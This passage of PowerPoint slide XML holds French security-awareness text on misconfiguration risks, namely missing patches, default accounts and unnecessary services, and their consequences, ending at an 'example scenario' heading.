                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>besoin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>travailler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> ensemble pour </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>s’assure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’ensemble</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des couches </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>configurée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>correctement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Les scanners </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>automatisés</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>utiles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> pour </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>détecter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>patchs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>manquants</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>erreur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de configuration, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>comptes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> par </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>défaut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, services </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>inutiles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Cette</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vulnérabilité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>donne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>souvent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> aux </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>attaquants</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>accès</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> non </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>autorisés</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>systèmes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Occasionnellement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ces</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vulnérabilités</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>entrainent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>compromission</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>complète</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> du </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>système</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</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en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>système</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>être</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>compromis</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  sans le savoir. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L’ensemble</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>données</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>être</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>dérobé</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>modifié</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>lentement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>dans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> le temps. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>coûts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>récupération</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peuvent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>être</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>élevés</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>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100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
